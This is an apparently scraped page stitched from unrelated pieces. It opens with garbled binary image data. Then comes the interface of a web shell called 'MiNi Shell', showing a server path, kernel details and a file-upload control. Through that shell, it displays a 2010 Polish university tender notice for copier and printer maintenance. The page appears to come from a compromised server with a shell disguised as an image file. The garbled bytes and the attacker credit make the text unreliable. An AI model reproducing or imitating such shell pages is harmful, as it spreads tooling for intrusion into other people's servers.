JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/3509-N-2010.html

<p class="kh_header"><b>Płock: Wykonanie konserwacji, napraw, przeglądów technicznych kserokopiarek, drukarek wraz z wymianą części i dostawą materiałów eksploatacyjnych do tych urządzeń</b><br>
<b>Numer ogłoszenia: 3509 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku , Pl. Dąbrowskiego 2, 09-402 Płock, woj. mazowieckie, tel. 024 3665400, faks 024 3665421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwszplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie konserwacji, napraw, przeglądów technicznych kserokopiarek, drukarek wraz z wymianą części i dostawą materiałów eksploatacyjnych do tych urządzeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie konserwacji, napraw, przeglądów technicznych kserokopiarek, drukarek wraz z wymianą części i dostawą materiałów eksploatacyjnych do tych urządzeń

2. W zakres prac naprawczo-konserwacyjnych wchodzi:

1) Konserwacja i czyszczenie urządzeń, zgodnie z zaleceniami ich producentów dotyczącymi 
    eksploatacji tych urządzeń,
2) Diagnostyka awarii,
3) Prace naprawczo-konserwacyjne urządzeń będących po okresie gwarancji, mające na 
    celu zabezpieczenie bezawaryjnej pracy urządzeń we wszystkich jednostkach 
    zamawiającego,
4) Jednorazowa konserwacja:
- Czyszczenie systemu optycznego (lustra, soczewki, itp.);
- Czyszczenie elektrod i regulacja,
- Czyszczenie mechanizmów pobierania i prowadzenia papieru, separatorów, itp.,
- Czyszczenie zespołów utrwalania i wywoływania,
- Sprawdzenie jakości kopii i poprawnego działania wszystkich funkcji myszy,
- Czyszczenie zespołu transportu papieru, zespołu wywołującego, 
- Czyszczenie i odkurzanie wnętrza maszyny i inne, wykonywane zgodnie z instrukcją 
            serwisową producenta określoną dla danego modelu kserokopiarki i drukarki.
5) Dostawa nowych części zamiennych wraz z wymianą uszkodzonych lub zużytych części 
    w urządzeniach z wyłączeniem materiałów eksploatacyjnych, tj. tonerów.

3. Wymagania zamawiającego:
1) Wykonawca zobowiązuje się do wykonania usługi w sposób zgodny z aktualną wiedzą 
    techniczną.
2) Wykonawca będzie zobowiązany utrzymywać gotowość do świadczenia w siedzibie 
    zamawiającego usług będących przedmiotem niniejszego zamówienia w godzinach od 
    8:00 do 15:00 od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy,
3) Wykonawca przystąpi do realizacji zlecenia wyłącznie po pisemnym zaakceptowaniu 
    oszacowanej wartości naprawy przez zamawiającego,
4) Pracownik serwisu będzie zobowiązany do wykonania - przed i po każdej wizycie serwisu 
    kontrolnej kopii,
5) Pracownik serwisu każdorazowo po wykonaniu czynności objętych przedmiotem 
    zamówienia, musi sporządzić kartę pracy,
6) Podstawą wystawienia faktury będzie karta pracy, w której wykonawca jednoznacznie 
    określi rodzaj wykonanej usługi. Karta pracy winna być podpisana przez upoważnionych 
    przedstawicieli zamawiającego i Wykonawcy,
7) Naprawa oraz konserwacja kserokopiarek i drukarek będzie wykonywana w jednostkach 
    organizacyjnych zamawiającego, tylko w wyjątkowych sytuacjach w punkcie serwisowym, 
    gdy naprawa na miejscu okaże się niemożliwa,
8) W przypadku, gdy naprawa odbywać się będzie w punkcie serwisowym Wykonawcy, 
    transport naprawianych urządzeń odbywać się będzie na koszt i ryzyko Wykonawcy,
9) Wykonawca w cenie 1 roboczogodziny musi uwzględnić koszty dojazdu do jednostek 
     zamawiającego, koszty transportu kserokopiarek i drukarek, czas na wykonanie 
     naprawy, np. wymiana bębna światłoczułego, wymiana listwy, lub wymiana innych 
     części. Cena 1 roboczogodziny jest taka sama dla wszystkich typów kserokopiarek i 
     drukarek bez względu na rodzaj wykonywanej naprawy,
10) Wykonawca udzieli gwarancji na wykonaną naprawę na okres minimum 6 miesięcy,
11) Udzielana przez wykonawcę gwarancja, o której mowa w pkt 10 nie dotyczy 
      wymienianych w czasie naprawy lub konserwacji części, na które wykonawca udziela 
      gwarancji zgodnie z gwarancją udzielaną przez producenta,
12) Wszystkie zastosowane przez wykonawcę części zamienne do kserokopiarek i drukarek 
      muszą być oryginalne i technicznie nowe,
13) Wymagany przez zamawiającego rzeczywisty czas reakcji (przybycia) służb 
      serwisowych na zgłoszoną przez zamawiającego potrzebę naprawy lub konserwacji 
      wynosi maksymalnie do 1 dnia roboczego, licząc od chwili zgłoszenia,
14) Wymagany przez zamawiającego maksymalny czas naprawy - 3 dni robocze licząc od 
      momentu przystąpienia do naprawy.
15) Zamawiający wymaga, aby Wykonawca zastosował wymagane przez producentów 
      sprzętu określonego w załączniku nr 3 do SIWZ (Formularz cenowy) tonery i wkłady 
      drukujące.

4. Wykaz rodzajowy i ilościowy kserokopiarek, drukarek, faksów, tonerów i wkładów 
    drukujących został określony w załączniku nr 3 do SIWZ (formularzu cenowym).

5. Przez miejsca świadczenia usługi i dostaw będących przedmiotem niniejszego     
    zamówienia należy rozumieć jednostki organizacyjne znajdujące się w obiektach i 
    budynkach Zamawiającego:
    1) budynek w Płocku przy Plac Dąbrowskiego 2 mieszczący: Rektorat, Instytut Matematyki 
        i Informatyki, Bibliotekę Uczelnianą, Akademickie Liceum Ogólnokształcące,    
        Administrację,
    2) budynek Instytutu Neofilologii w Płocku przy ul. Kościuszki 20,
    3) budynki: Instytutu Pedagogiki oraz Studium Wychowania Fizycznego i Sportu w Płocku 
        przy ul. Gałczyńskiego 28,
    4) budynek Domu Studenta Nr 1 w Płocku przy ul. Nowowiejskiego 6,
    5) budynki Instytutu Nauk Ekonomicznych w Trzepowie Nowym 55 gm. Stara Biała pow. 
        płocki..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8, 30.19.21.13-6, 50.31.30.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2006 r., Nr 164, poz. 1163, z późn. zm.), dotyczące:

1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tzn.:
1) prowadzą działalność gospodarczą w przedmiotowym zakresie, zarejestrowaną w 
    Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności 
    Gospodarczej.
2.	Posiadania wiedzy i doświadczenia.
3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
      4. Sytuacji ekonomicznej i finansowej.
       
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia - nie spełnia, na podstawie wymaganych i dostarczonych dokumentów do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Zamawiający wymaga złożenia w ofercie następujących dokumentów, oświadczeń:
1.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych - w oparciu o załącznik Nr 2 do SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.

B. Do oferty należy załączyć również:
1. Wypełniony formularz oferty  i formularz cenowy załączony do SIWZ, w oparciu o 
    załącznik Nr 1 i Nr 3 do SIWZ.
2. Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio 
    z załączonych dokumentów.
3. Informacje dotyczące podwykonawców - w oparciu o załącznik Nr 4 do SIWZ. Jeżeli 
    Wykonawca nie przewiduje zatrudnienia podwykonawców wpisuje - nie dotyczy.  
4. W przypadku złożenia oferty wspólnej:
   - przedsiębiorcy występujący wspólnie muszą upoważnić jednego spośród siebie jako  przedstawiciela pozostałych - lidera do zaciągania zobowiązań i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez pozostałych przedsiębiorców lub ich uprawnionych przedstawicieli.
W powyższym przypadku przedsiębiorcy winni złożyć zgodne oświadczenie woli dotyczące wskazania podmiotu i jego rachunku bankowego, przez który       przeprowadzane będą wszystkie operacje finansowe związane  z przedmiotem zamówienia.
Dokumenty, o których mowa w ust A. pkt 1, 2 oraz ust. B. pkt 2 winien załączyć każdy z przedsiębiorców składających ofertę wspólną. Oferta składana przez spółki cywilne jest traktowana, jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

Dokumenty są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pwszplock.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - Państwowa Wyższa Szkoła Zawodowa w Płocku,       Pl. Dąbrowskiego 2, 09-402 Płock - pok. 123.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2010 godzina 11:45, miejsce: W siedzibie Zamawiającego - Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, 09-402 Płock - Sekretariat Kanclerza, pok. 202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com